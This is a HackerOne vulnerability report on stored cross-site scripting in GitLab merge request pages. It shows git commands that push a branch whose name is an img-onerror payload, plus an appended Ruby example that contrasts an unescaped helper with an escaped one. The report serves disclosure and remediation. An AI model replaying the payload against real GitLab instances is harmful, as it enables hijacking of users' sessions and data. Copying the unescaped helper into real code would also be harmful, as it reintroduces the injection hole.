ESCALATED: Stored XSS in merge request pages
HackerOne report #723307 by mike12
on 2019-10-26, assigned to @ankelly:
Hello Gitlab!
To reproduce the bug, we need to open a merge request with the following conditions:
- Project must have 'Merge commit with semi-linear history' or 'Fast-forward merge' merge method
- The merge request must require rebase before fast-forward/merge
- A visitor of the merge request page must not have permissions to push to source branch
- Target branch must have a special name: `<img/src='x'/onerror=alert(document.domain)>` :)
Steps to reproduce:
- Run Gitlab:
```shell
docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
```
- Create a new project
- Go to the project settings and set the 'Merge method' to 'Fast-forward merge' or 'Merge commit with semi-linear history'
- Clone the repository and run the following in the repository:
```shell
# initial commit on master
touch 1.txt
git add 1.txt
git commit -m "initial commit"
git push origin master
# branch whose name carries the payload
git checkout -b "<img/src='x'/onerror=alert(document.domain)>"
touch 2.txt
git add 2.txt
git commit -m "add 2.txt"
git push origin "<img/src='x'/onerror=alert(document.domain)>"
# advance master so the merge request needs a rebase
git checkout master
touch 3.txt
git add 3.txt
git commit -m "add 3.txt"
git push origin master
```
- Create a merge request: `master` => `<img/src='x'/onerror=alert(document.domain)>`
- Then we have to visit the merge request page under a user who does not have permissions to push to the source branch (in our case, the `master` branch). For example:
  - Make the project public and visit the merge request page under any user who does not have permissions in the project (or without authorization)
  - Invite a user to the project, but without permissions to push to the source branch.
root@gitlab:/# gitlab-rake gitlab:env:info
System information
System:
Current User: git
Using RVM: no
Ruby Version: 2.6.3p62
Gem Version: 2.7.9
Bundler Version: 1.17.3
Rake Version: 12.3.3
Redis Version: 3.2.12
Git Version: 2.22.0
Sidekiq Version: 5.2.7
Go Version: unknown
GitLab information
Version: 12.4.0
Revision: 1425a56c75b
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 10.9
URL: http://gitlab.example.com
HTTP Clone URL: http://gitlab.example.com/some-group/some-project.git
SSH Clone URL: git@gitlab.example.com:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 10.2.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
root@gitlab:/#
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data
- Steal user's credentials
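As an added illustration of the escaping failure this report describes (example code written for this page, not GitLab's own template or code): a hypothetical Rails-style helper builds the "rebase required" notice twice, once by interpolating the branch names straight into an HTML fragment and once by passing them through `ERB::Util.html_escape` first, and a small allow-list scan shows which version lets the branch name inject a tag. The notice wording, the helper names and the allowed-tag list are assumptions; the branch name is the payload quoted in the report.

```ruby
require 'erb'

# Branch name from the report; the other one is a constructed, harmless sample.
PAYLOAD_BRANCH = "<img/src='x'/onerror=alert(document.domain)>"
SAFE_BRANCH    = "feature/login-fix"

# Vulnerable pattern (hypothetical, not GitLab's actual template): untrusted
# branch names are interpolated directly into markup that will be rendered as HTML.
def rebase_notice_unsafe(source, target)
  "<p>Fast-forward merge is not possible. Rebase <strong>#{source}</strong> " \
    "onto <strong>#{target}</strong>.</p>"
end

# Hardened form: every untrusted value is HTML-escaped before it enters the
# fragment, so <, >, ", ' and & become entities and the browser shows them as text.
def rebase_notice_safe(source, target)
  h = ->(s) { ERB::Util.html_escape(s) }
  "<p>Fast-forward merge is not possible. Rebase <strong>#{h.(source)}</strong> " \
    "onto <strong>#{h.(target)}</strong>.</p>"
end

# Crude output check: list every tag name in the fragment that the template
# itself does not emit. Anything returned here came from user-controlled input.
ALLOWED_TAGS = %w[p strong].freeze

def foreign_tags(html)
  html.scan(%r{</?([a-zA-Z][a-zA-Z0-9]*)}).flatten.map(&:downcase).uniq - ALLOWED_TAGS
end

if __FILE__ == $PROGRAM_NAME
  [SAFE_BRANCH, PAYLOAD_BRANCH].each do |target|
    puts "target branch: #{target}"
    puts "  unsafe -> foreign tags: #{foreign_tags(rebase_notice_unsafe('master', target)).inspect}"
    puts "  safe   -> foreign tags: #{foreign_tags(rebase_notice_safe('master', target)).inspect}"
    puts "  safe fragment: #{rebase_notice_safe('master', target)}"
  end
end
```

The scan is a test aid, not a sanitizer: the fix is escaping at the point where the value enters the HTML (or letting the template engine do it), never a blocklist on branch names, since Git accepts `<`, `>`, `'`, `=` and `(` in ref names.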